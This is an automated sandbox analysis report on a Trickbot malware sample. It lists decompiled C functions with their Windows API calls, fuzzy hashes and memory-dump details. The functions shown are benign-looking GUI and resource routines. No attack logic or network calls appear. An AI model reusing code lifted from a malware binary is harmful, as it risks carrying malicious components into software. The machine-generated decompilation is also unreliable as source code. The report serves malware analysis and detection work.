                          • Opcode Fuzzy Hash: 5f4e7535a614563e03e4b539d9225fb8cf9caa6961f17facdb117b74df09aca8
                          • Instruction Fuzzy Hash: 4AF08231100705AFDB202F55DC49927BBE5EB44711B01853DE14652560CBB2BC09DF64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E00423A9E(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				struct tagRECT _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				struct tagRECT _v68;
                          				intOrPtr _t173;
                          				intOrPtr* _t174;
                          				intOrPtr _t177;
                          				signed char _t179;
                          				intOrPtr* _t181;
                          				signed char _t185;
                          				signed int _t187;
                          				signed int _t188;
                          				intOrPtr* _t202;
                          				signed int _t205;
                          				signed int _t206;
                          				signed int _t215;
                          				signed int _t224;
                          				intOrPtr* _t227;
                          				intOrPtr* _t232;
                          				intOrPtr _t233;
                          				signed int _t250;
                          				signed int _t252;
                          				signed int _t256;
                          				signed int _t260;
                          				void* _t263;
                          				signed int _t266;
                          				signed int _t268;
                          				intOrPtr _t272;
                          				signed int _t275;
                          				signed int _t279;
                          
                          				_t263 = __edx;
                          				_t227 = __ecx;
                          				_t266 = 0;
                          				_push(0);
                          				_push(0);
                          				_push(0x418);
                          				_v8 = 0;
                          				_v52 = 0;
                          				_v48 = 0;
                          				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
                          				_v28 = _t275;
                          				if(_t275 != 0) {
                          					_t177 = E0041BDEB(_t275 + _t275 * 4 << 2);
                          					_v8 = _t177;
                          					if(_t275 > 0) {
                          						_v12 = _t177;
                          						do {
                          							E00423524(_t227, _t266, _v12);
                          							_v12 = _v12 + 0x14;
                          							_t266 = _t266 + 1;
                          						} while (_t266 < _t275);
                          						_t268 = 0;
                          						if(_t275 > 0) {
                          							_t179 =  *(_t227 + 0x64);
                          							if((_t179 & 0x00000002) == 0) {
                          								_t256 = _t179 & 0x00000004;
                          								_v44.bottom = _t256;
                          								if(_t256 == 0) {
                          									L19:
                          									_push(_t268);
                          									asm("sbb eax, eax");
                          									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
                          									__eflags = _t215;
                          									_push(_t215);
                          								} else {
                          									if((_a8 & 0x00000004) != 0) {
                          										L18:
                          										_push(_t268);
                          										_push( *((intOrPtr*)(_t227 + 0x54)));
                          									} else {
                          										if((_a8 & 0x00000008) == 0) {
                          											__eflags = _a8 & 0x00000010;
                          											if((_a8 & 0x00000010) == 0) {
                          												__eflags = _a12 - 0xffffffff;
                          												if(_a12 == 0xffffffff) {
                          													__eflags = _t179 & 0x00000001;
                          													if((_t179 & 0x00000001) == 0) {
                          														goto L19;
                          													} else {
                          														goto L18;
                          													}
                          												} else {
                          													SetRectEmpty( &_v44);
                          													E00429BAB(_t227,  &_v44, _a8 & 0x00000002);
                          													_t224 = _a8 & 0x00000020;
                          													__eflags = _t224;
                          													if(_t224 == 0) {
                          														_t260 = _v44.right - _v44.left;
                          														__eflags = _t260;
                          													} else {
                          														_t260 = _v44.bottom - _v44.top;
                          													}
                          													_push(_t224);
                          													_push(_t260 + _a12);
                          												}
                          											} else {
                          												_push(0);
                          												_push(0);
                          											}
                          										} else {
                          											_push(0);
                          											_push(0x7fff);
                          										}
                          									}
                          								}
                          								_push(_t275);
                          								_push(_v8);
                          								E00423941(_t227, _t263);
                          							}
                          							_push(_t275);
                          							_push(_v8);
                          							_push( &(_v44.right));
                          							_t181 = E00423745(_t227);
                          							_v52 =  *_t181;
                          							_v48 =  *((intOrPtr*)(_t181 + 4));
                          							if((_a8 & 0x00000040) != 0) {
                          								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
                          								_v20 = _t268;
                          								_v44.bottom =  *(_t227 + 0x84);
                          								if(_t275 > 0) {
                          									_t250 = _t275;
                          									_t202 = _v8 + 4;
                          									_v24 = _t202;
                          									do {
                          										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
                          											_t268 = _t268 + 1;
                          										}
                          										_t202 = _t202 + 0x14;
                          										_t250 = _t250 - 1;
                          									} while (_t250 != 0);
                          									if(_t268 > 0) {
                          										_t205 = E0041BDEB(_t268 + _t268 * 2 << 3);
                          										if(_t205 == 0) {
                          											_t205 = 0;
                          											__eflags = 0;
                          										} else {
                          											_a12 = _t268 - 1;
                          										}
                          										_v16 = _v16 & 0x00000000;
                          										_a12 = _a12 & 0x00000000;
                          										_v20 = _t205;
                          										_t67 = _t205 + 8; // 0x8
                          										_t272 = _t67;
                          										_t206 = _v24;
                          										_v12 = _t272;
                          										_v24 = _t206;
                          										do {
                          											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
                          												_t252 = _a12;
                          												 *((intOrPtr*)(_t272 - 8)) = _t252;
                          												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
                          												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
                          												E004214BA(_t227,  &_v68);
                          												_v16 = _v16 + 1;
                          												asm("movsd");
                          												asm("movsd");
                          												_v12 = _v12 + 0x18;
                          												_t206 = _v24;
                          												asm("movsd");
                          												asm("movsd");
                          												_t275 = _v28;
                          												_t272 = _v12;
                          											}
                          											_a12 = _a12 + 1;
                          											_t206 = _t206 + 0x14;
                          											_v24 = _t206;
                          										} while (_a12 < _t275);
                          										_t268 = _v16;
                          									}
                          								}
                          								_t185 =  *(_t227 + 0x64);
                          								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
                          									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
                          								}
                          								_a12 = _a12 & 0x00000000;
                          								_t308 = _t275;
                          								if(_t275 > 0) {
                          									_v16 = _v8;
                          									do {
                          										E00423543(_t227, _t308, _a12, _v16);
                          										_a12 = _a12 + 1;
                          										_v16 = _v16 + 0x14;
                          									} while (_a12 < _t275);
                          								}
                          								if(_t268 > 0) {
                          									_t187 = _v20;
                          									_v24 = _t268;
                          									_t113 = _t187 + 8; // 0x8
                          									_t279 = _t113;
                          									_a12 = _t279;
                          									do {
                          										_t188 = E0041B5B5(_t227,  *((intOrPtr*)(_t279 - 4)));
                          										_v28 = _t188;
                          										if(_t188 != 0) {
                          											GetWindowRect( *(_t188 + 0x1c),  &_v68);
                          											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
                          											E0041B784(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
                          											_t279 = _a12;
                          										}
                          										_t279 = _t279 + 0x18;
                          										_t130 =  &_v24;
                          										 *_t130 = _v24 - 1;
                          										_a12 = _t279;
                          									} while ( *_t130 != 0);
                          									E0041BE14(_v20);
                          								}
                          								 *(_t227 + 0x84) = _v44.bottom;
                          							}
                          							E0041BE14(_v8);
                          						}
                          					}
                          				}
                          				SetRectEmpty( &_v68);
                          				E00429BAB(_t227,  &_v68, _a8 & 0x00000002);
                          				_v48 = _v48 + _v68.top - _v68.bottom;
                          				_v52 = _v52 + _v68.left - _v68.right;
                          				_t232 = E00428D38( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
                          				_t173 =  *_t232;
                          				_t233 =  *((intOrPtr*)(_t232 + 4));
                          				if(_v52 <= _t173) {
                          					_v52 = _t173;
                          				}
                          				if(_v48 <= _t233) {
                          					_v48 = _t233;
                          				}
                          				_t174 = _a4;
                          				 *_t174 = _v52;
                          				 *((intOrPtr*)(_t174 + 4)) = _v48;
                          				return _t174;
                          			}

                          0x00423a9e
                          0x00423aa7
                          0x00423aa9
                          0x00423aad
                          0x00423aae
                          0x00423aaf
                          0x00423ab4
                          0x00423ab7
                          0x00423aba
                          0x00423ac3
                          0x00423ac7
                          0x00423aca
                          0x00423ad7
                          0x00423adf
                          0x00423ae2
                          0x00423ae8
                          0x00423aeb
                          0x00423af1
                          0x00423af6
                          0x00423afa
                          0x00423afb
                          0x00423aff
                          0x00423b03
                          0x00423b09
                          0x00423b0e
                          0x00423b16
                          0x00423b19
                          0x00423b1c
                          0x00423b87
                          0x00423b8a
                          0x00423b8f
                          0x00423b91
                          0x00423b91
                          0x00423b96
                          0x00423b1e
                          0x00423b22
                          0x00423b81
                          0x00423b81
                          0x00423b82
                          0x00423b24
                          0x00423b28
                          0x00423b32
                          0x00423b36
                          0x00423b3c
                          0x00423b40
                          0x00423b7d
                          0x00423b7f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00423b42
                          0x00423b46
                          0x00423b59
                          0x00423b61
                          0x00423b61
                          0x00423b64
                          0x00423b71
                          0x00423b71
                          0x00423b66
                          0x00423b69
                          0x00423b69
                          0x00423b74
                          0x00423b7a
                          0x00423b7a
                          0x00423b38
                          0x00423b38
                          0x00423b39
                          0x00423b39
                          0x00423b2a
                          0x00423b2a
                          0x00423b2b
                          0x00423b2b
                          0x00423b28
                          0x00423b22
                          0x00423b97
                          0x00423b9a
                          0x00423b9d
                          0x00423b9d
                          0x00423ba2
                          0x00423ba6
                          0x00423bab
                          0x00423bac
                          0x00423bba
                          0x00423bbd
                          0x00423bc0
                          0x00423bcc
                          0x00423bd5
                          0x00423bd8
                          0x00423bdb
                          0x00423be4
                          0x00423be6
                          0x00423be9
                          0x00423bec
                          0x00423bf0
                          0x00423bf7
                          0x00423bf7
                          0x00423bf8
                          0x00423bfb
                          0x00423bfb
                          0x00423c00
                          0x00423c0d
                          0x00423c15
                          0x00423c1d
                          0x00423c1d
                          0x00423c17
                          0x00423c18
                          0x00423c18
                          0x00423c1f
                          0x00423c23
                          0x00423c27
                          0x00423c2a
                          0x00423c2a
                          0x00423c2d
                          0x00423c30
                          0x00423c33
                          0x00423c36
                          0x00423c3a
                          0x00423c41
                          0x00423c47
                          0x00423c4c
                          0x00423c55
                          0x00423c61
                          0x00423c69
                          0x00423c6c
                          0x00423c6d
                          0x00423c6e
                          0x00423c72
                          0x00423c75
                          0x00423c76
                          0x00423c77
                          0x00423c7a
                          0x00423c7a
                          0x00423c7d
                          0x00423c80
                          0x00423c86
                          0x00423c86
                          0x00423c8b
                          0x00423c8b
                          0x00423c00
                          0x00423c8e
                          0x00423c93
                          0x00423c9c
                          0x00423c9c
                          0x00423c9f
                          0x00423ca3
                          0x00423ca5
                          0x00423caa
                          0x00423cad
                          0x00423cb5
                          0x00423cba
                          0x00423cbd
                          0x00423cc1
                          0x00423cad
                          0x00423cc8
                          0x00423cca
                          0x00423ccd
                          0x00423cd0
                          0x00423cd0
                          0x00423cd3
                          0x00423cd6
                          0x00423cdb
                          0x00423ce2
                          0x00423ce5
                          0x00423cee
                          0x00423d11
                          0x00423d2d
                          0x00423d32
                          0x00423d32
                          0x00423d35
                          0x00423d38
                          0x00423d38
                          0x00423d3b
                          0x00423d3b
                          0x00423d43
                          0x00423d48
                          0x00423d4c
                          0x00423d4c
                          0x00423d55
                          0x00423d5a
                          0x00423b03
                          0x00423ae2
                          0x00423d5f
                          0x00423d72
                          0x00423d80
                          0x00423d89
                          0x00423d9c
                          0x00423da1
                          0x00423da6
                          0x00423da9
                          0x00423dab
                          0x00423dab
                          0x00423db1
                          0x00423db3
                          0x00423db3
                          0x00423db6
                          0x00423dbc
                          0x00423dc1
                          0x00423dc5

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Empty$Window
                          • String ID: @
                          • API String ID: 444217639-2766056989
                          • Opcode ID: 8b116a2d27c3ab3b887eb2d1501e76618caee2e8c6f71f1212b67f0297517312
                          • Instruction ID: da19c17324a5d7ebd5f2a337ac845fc1532864cc082d3debe08a0ebf2618bd52
                          • Opcode Fuzzy Hash: 8b116a2d27c3ab3b887eb2d1501e76618caee2e8c6f71f1212b67f0297517312
                          • Instruction Fuzzy Hash: CDC15871A00229AFCF15CFA9D884AEEBBB4FF44315F44446AE815A7351D738AE01CF64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E00403380(void* __ecx, void* __eflags) {
                          				intOrPtr _v4;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t11;
                          				signed int _t14;
                          				signed int _t15;
                          				intOrPtr* _t31;
                          				intOrPtr* _t33;
                          				intOrPtr* _t34;
                          				void* _t35;
                          				intOrPtr _t36;
                          				void* _t60;
                          				void* _t62;
                          				intOrPtr* _t63;
                          
                          				_t60 = __ecx;
                          				_t11 = E00402FA0(__eflags);
                          				_t66 = _t11;
                          				if(_t11 == 0) {
                          					_t31 = E00402D70(__ecx, E00402F20(_t66, E00402EF0(0x65, _t11)));
                          					_t62 = _t62 + 0x10;
                          					 *_t31();
                          				}
                          				CommandLineToArgvW(L"HELLO", 0);
                          				_t14 = E0042D57E(_v4);
                          				if(_t14 == 0xffffffff) {
                          					L12:
                          					_t15 = _t14 | 0xffffffff;
                          					__eflags = _t15;
                          					return _t15;
                          				} else {
                          					_push(0xe800);
                          					_t63 = _t62 - 0x10;
                          					_t33 = _t63;
                          					_t61 = _t60 + 0x138;
                          					_push(0x50402834);
                          					 *_t33 = 0;
                          					_push(0x800);
                          					_push(_t60);
                          					 *((intOrPtr*)(_t33 + 4)) = 0;
                          					 *((intOrPtr*)(_t33 + 8)) = 0;
                          					 *((intOrPtr*)(_t33 + 0xc)) = 0;
                          					_t14 = E00430BB8(_t60 + 0x138);
                          					if(_t14 == 0) {
                          						goto L12;
                          					} else {
                          						_t14 = E00430D22(_t61, 0x80);
                          						if(_t14 == 0) {
                          							goto L12;
                          						} else {
                          							_push(0xe800);
                          							_t34 = _t63 - 0x10;
                          							_t59 = _t60 + 0x1d4;
                          							_push(0x50401434);
                          							 *_t34 = 0;
                          							_push(0x800);
                          							_push(_t60);
                          							 *((intOrPtr*)(_t34 + 4)) = 0;
                          							 *((intOrPtr*)(_t34 + 8)) = 0;
                          							 *((intOrPtr*)(_t34 + 0xc)) = 0;
                          							_t14 = E00430BB8(_t60 + 0x1d4);
                          							if(_t14 == 0) {
                          								goto L12;
                          							} else {
                          								_t14 = E00430D22(_t59, 0x86);
                          								if(_t14 == 0) {
                          									goto L12;
                          								} else {
                          									_t35 = 0;
                          									do {
                          										E004236F8(_t59, 0, _t35, E004236D5(_t59, 0, _t35) | 0x00000006);
                          										_t35 = _t35 + 1;
                          									} while (_t35 < 3);
                          									E0041B705(_t61, "Standard");
                          									E0041B705(_t59, "Drawing");
                          									_t36 = _t60 + 0xbc;
                          									_t14 = E00431091(_t60, 0x50008200, 0xe801);
                          									if(_t14 == 0) {
                          										goto L12;
                          									} else {
                          										_t14 = E00431146(_t36, _t60, 0x447288, 4);
                          										if(_t14 == 0) {
                          											goto L12;
                          										} else {
                          											_push(0xf000);
                          											E00427FE0(_t61);
                          											_push(0xf000);
                          											E00427FE0(_t59);
                          											_push(0xf000);
                          											E0042EE69(_t60);
                          											E0042EEFE(_t60, _t61, 0, 0);
                          											E0042EEFE(_t60, _t59, 0, 0);
                          											return 0;
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • CommandLineToArgvW.SHELL32(HELLO,00000000), ref: 004033AF
                            • Part of subcall function 00402EF0: LoadStringW.USER32(?,?,?,00000000), ref: 00402F0A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ArgvCommandLineLoadString
                          • String ID: Drawing$HELLO$Standard
                          • API String ID: 2666356611-1713542543
                          • Opcode ID: 0031b0ec6b77e8492828d638738c1d146103e59a04ea5ae39133c4093b2901e6
                          • Instruction ID: 36ed798fba729db1d9542e65fd8d07052538e9dceadaa623bcc80a55ad437f81
                          • Opcode Fuzzy Hash: 0031b0ec6b77e8492828d638738c1d146103e59a04ea5ae39133c4093b2901e6
                          • Instruction Fuzzy Hash: B531E03034030037EB143A764D96B7B65899FC4718F14893FBA06EA2C2EEBCA905826C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0041C9C1(void** __ecx, char* _a4, short _a8) {
                          				signed int _v8;
                          				void** _v12;
                          				signed int _v16;
                          				short* _v20;
                          				short _v84;
                          				signed int _t47;
                          				signed int _t48;
                          				void* _t61;
                          				signed int* _t67;
                          				void* _t75;
                          				signed int _t81;
                          				short* _t84;
                          				signed int _t86;
                          				signed int _t93;
                          				void** _t94;
                          				void* _t96;
                          
                          				_v12 = __ecx;
                          				if(__ecx[1] != 0) {
                          					_t67 = GlobalLock( *__ecx);
                          					_t47 = _t67[0];
                          					_v8 = 0 | _t47 == 0x0000ffff;
                          					if(_t47 != 0xffff) {
                          						_t48 =  *_t67;
                          					} else {
                          						_t48 = _t67[3];
                          					}
                          					asm("sbb esi, esi");
                          					_v16 = _t48 & 0x00000040;
                          					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
                          					if(_v8 == 0) {
                          						 *_t67 =  *_t67 | 0x00000040;
                          					} else {
                          						_t67[3] = _t67[3] | 0x00000040;
                          					}
                          					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
                          					_t84 = E0041C844(_t67);
                          					_t75 = 0;
                          					_v20 = _t84;
                          					if(_v16 != 0) {
                          						_t75 = _t93 + 2 + E004050FE(_t84 + _t93) * 2;
                          					}
                          					_t26 = _t84 + 3; // 0x3
                          					_t55 = _t75 + _t26 & 0x000000fc;
                          					_v16 = _t75 + _t26 & 0x000000fc;
                          					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
                          					if(_v8 == 0) {
                          						_t81 = _t67[2];
                          					} else {
                          						_t81 = _t67[4];
                          					}
                          					if(_a4 != _t75 && _t81 > 0) {
                          						E00405BD0(_t86, _t55, _t67 - _t55 + _v12[1]);
                          						_t96 = _t96 + 0xc;
                          					}
                          					 *_v20 = _a8;
                          					E00405BD0(_v20 + _t93,  &_v84, _a4 - _t93);
                          					_t94 = _v12;
                          					_t94[1] = _t94[1] + _t86 - _v16;
                          					GlobalUnlock( *_t94);
                          					_t94[2] = _t94[2] & 0x00000000;
                          					_t61 = 1;
                          					return _t61;
                          				}
                          				return 0;
                          			}

                          APIs
                          • GlobalLock.KERNEL32 ref: 0041C9DD
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041CA30
                          • GlobalUnlock.KERNEL32(?), ref: 0041CAC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$ByteCharLockMultiUnlockWide
                          • String ID: @
                          • API String ID: 231414890-2766056989
                          • Opcode ID: ea3a5fecfd012418335debcbf0f2eac21158dc171b8458669a65e634b9fa6453
                          • Instruction ID: f6f5c9610b28406999a77ca1999340165e511c29f7404b35dac89977d312c6f6
                          • Opcode Fuzzy Hash: ea3a5fecfd012418335debcbf0f2eac21158dc171b8458669a65e634b9fa6453
                          • Instruction Fuzzy Hash: 7741EA71800219EBCB11DF94CC81AFFB7B4FF04354F14816AE815AB294D7749986CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E004121F0(void* __eflags) {
                          				void* _t19;
                          				long _t24;
                          				void* _t27;
                          				void* _t31;
                          				signed int* _t35;
                          				intOrPtr _t36;
                          				signed short _t41;
                          				struct HWND__* _t43;
                          				signed int _t44;
                          				void* _t45;
                          				void* _t46;
                          
                          				_t43 =  *(_t45 + 0x1c);
                          				_t19 = E004105F0(_t43);
                          				_t46 = _t45 + 4;
                          				if(_t19 == 0) {
                          					_t44 = 0;
                          					_t35 = 0x43edcc;
                          					GetClassNameA(_t43, _t46 + 0x10, 0x10);
                          					_t41 =  *((intOrPtr*)(_t46 + 0x28));
                          					do {
                          						if(( *_t35 & _t41) == 0) {
                          							goto L5;
                          						} else {
                          							_t7 = _t35 - 0x1c; // 0x43edb0
                          							if(lstrcmpA(_t7, _t46 + 0x10) == 0) {
                          								_t24 = GetWindowLongA(_t43, 0xfffffff0);
                          								_t36 =  *((intOrPtr*)(_t46 + 0x2c));
                          								_t27 =  *((intOrPtr*)((_t44 << 5) + 0x43edc8))(_t43, _t24, _t41, _t36,  *((intOrPtr*)(_t46 + 0x30)));
                          								if(_t27 != 1) {
                          									L12:
                          									asm("sbb eax, eax");
                          									return _t27 + 1;
                          								} else {
                          									if(_t36 != 1 ||  *0x44d362 != 0x10) {
                          										_t27 = E00410660(_t43,  *((intOrPtr*)(0x44dda0 + (_t44 + _t44 * 2) * 8)));
                          										goto L12;
                          									} else {
                          										_t31 = E00410800(_t43,  *((intOrPtr*)(0x44dda0 + (_t44 + _t44 * 2) * 8)));
                          										asm("sbb eax, eax");
                          										return _t31 + 1;
                          									}
                          								}
                          							} else {
                          								goto L5;
                          							}
                          						}
                          						goto L13;
                          						L5:
                          						_t35 =  &(_t35[8]);
                          						_t44 = _t44 + 1;
                          					} while (_t35 < "Unknown exception");
                          					return 0;
                          				} else {
                          					return 0;
                          				}
                          				L13:
                          			}

                          APIs
                          • GetClassNameA.USER32(?,?,00000010), ref: 00412221
                          • lstrcmpA.KERNEL32(0043EDB0,?), ref: 0041223A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClassNamelstrcmp
                          • String ID: Unknown exception
                          • API String ID: 3770760073-410509341
                          • Opcode ID: 7833a205476c4836d8e581b912ff83d28d29c44e87b547ca326807a22167338e
                          • Instruction ID: 3f1245d66fc38af4b08061a0ac964daef4c554e82ad76547effc74892b3afcf9
                          • Opcode Fuzzy Hash: 7833a205476c4836d8e581b912ff83d28d29c44e87b547ca326807a22167338e
                          • Instruction Fuzzy Hash: 18213876B002181FE710AB59EC45CFF335CEB85320F84057BFC15C2260E6BA999986AA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0042F000(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                          				intOrPtr _v8;
                          				void* __ebp;
                          				int _t42;
                          				void* _t69;
                          				intOrPtr _t71;
                          				intOrPtr* _t74;
                          				intOrPtr _t76;
                          				void* _t77;
                          
                          				_t69 = __edx;
                          				_push(__ecx);
                          				_t71 = _a4;
                          				_v8 = __ecx;
                          				if( *((intOrPtr*)(_t71 + 0x6c)) == 0) {
                          					L6:
                          					if(( *(_t71 + 0x64) & 0x00000004) != 0) {
                          						_a16 = _a16 | 0x00000004;
                          						if((_a17 & 0x00000050) != 0) {
                          							_a16 = _a16 & 0x0000002f | 0x00000020;
                          						}
                          					}
                          					_t74 = E0042EE30(_v8, _a16);
                          					E0041B784(_t74, 0, _a8, _a12, 0, 0, 0x15);
                          					if( *((intOrPtr*)(_t74 + 0x20)) == 0) {
                          						_t29 = _t71 + 0x1c; // 0xec4589db
                          						 *((intOrPtr*)(_t74 + 0x20)) =  *_t29;
                          					}
                          					E004272D6(E0041B5B5(_t74, 0xe81f), _t69, _t71, 0);
                          					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                          					_t32 = _t71 + 0x1c; // 0xec4589db
                          					_t42 = GetWindowLongA( *_t32, 0xfffffff0);
                          					if((_t42 & 0x10000000) == 0) {
                          						L14:
                          						return _t42;
                          					} else {
                          						E0041B7D3(_t74, 8);
                          						L13:
                          						_t42 = UpdateWindow( *(_t74 + 0x1c));
                          						goto L14;
                          					}
                          				}
                          				_t4 = _t71 + 0x70; // 0x8bfffed4
                          				_t76 =  *_t4;
                          				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x78)) == 0 || E0042726E(_t76) != 1 || ( *(_t76 + 0x64) & _a16 & 0x000000f0) == 0) {
                          					goto L6;
                          				} else {
                          					_t74 = E0041884D(_t77, GetParent( *(_t76 + 0x1c)));
                          					E0041B784(_t74, 0, _a8, _a12, 0, 0, 0x15);
                          					 *((intOrPtr*)( *_t74 + 0xc8))(1);
                          					goto L13;
                          				}
                          			}

                          APIs
                          • GetParent.USER32(?), ref: 0042F03A
                            • Part of subcall function 0041B784: SetWindowPos.USER32(?,?,?,00000015,000000FF,000000FF,?), ref: 0041B7AB
                          • GetWindowLongA.USER32(EC4589DB,000000F0), ref: 0042F0D7
                          • UpdateWindow.USER32(?), ref: 0042F0F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$LongParentUpdate
                          • String ID: P
                          • API String ID: 1906497633-3110715001
                          • Opcode ID: baf10c5edfdae501b624b73378d3379000bd6265af31b9dce8643cf66eac25e9
                          • Instruction ID: b919faccc7bccaa02f665cc23701f64dbe329708d68476e59ec41f884ccf73c3
                          • Opcode Fuzzy Hash: baf10c5edfdae501b624b73378d3379000bd6265af31b9dce8643cf66eac25e9
                          • Instruction Fuzzy Hash: 2331AFB1300614ABDB219F65D889BAB7BA5FF44704F80413AF942562E2CB79AC50CB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E0043059B(void* __edx) {
                          				signed char* _v8;
                          				char _v12;
                          				int _v16;
                          				void _v148;
                          				unsigned int _t20;
                          				int _t26;
                          				signed int _t36;
                          				struct HINSTANCE__* _t38;
                          				struct HBITMAP__* _t39;
                          				int _t41;
                          				unsigned int _t43;
                          				void* _t47;
                          				signed int* _t48;
                          				signed int _t53;
                          				signed int _t57;
                          				void* _t58;
                          				void* _t60;
                          
                          				_t47 = __edx;
                          				_t20 = GetMenuCheckMarkDimensions();
                          				_t41 = _t20;
                          				_t43 = _t20 >> 0x10;
                          				_v16 = _t43;
                          				if(_t41 > 0x20) {
                          					_t41 = 0x20;
                          				}
                          				asm("cdq");
                          				_t57 = _t41 + 0xf >> 4;
                          				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
                          				if(_t53 > 0xc) {
                          					_t53 = 0xc;
                          				}
                          				_t26 = 0x20;
                          				if(_t43 > _t26) {
                          					_v16 = _t26;
                          				}
                          				E00405360( &_v148, 0xff, 0x80);
                          				_v8 = 0x43acbc;
                          				_t58 = _t57 + _t57;
                          				_v12 = 5;
                          				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
                          				do {
                          					_v8 =  &(_v8[1]);
                          					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
                          					_t48[0] = _t36;
                          					 *_t48 = _t36;
                          					_t48 = _t48 + _t58;
                          					_t16 =  &_v12;
                          					 *_t16 = _v12 - 1;
                          				} while ( *_t16 != 0);
                          				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
                          				 *0x44b348 = _t38;
                          				if(_t38 == 0) {
                          					_t39 = LoadBitmapA(_t38, 0x7fe3);
                          					 *0x44b348 = _t39;
                          					return _t39;
                          				}
                          				return _t38;
                          			}

                          APIs
                          • GetMenuCheckMarkDimensions.USER32 ref: 004305A7
                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00430656
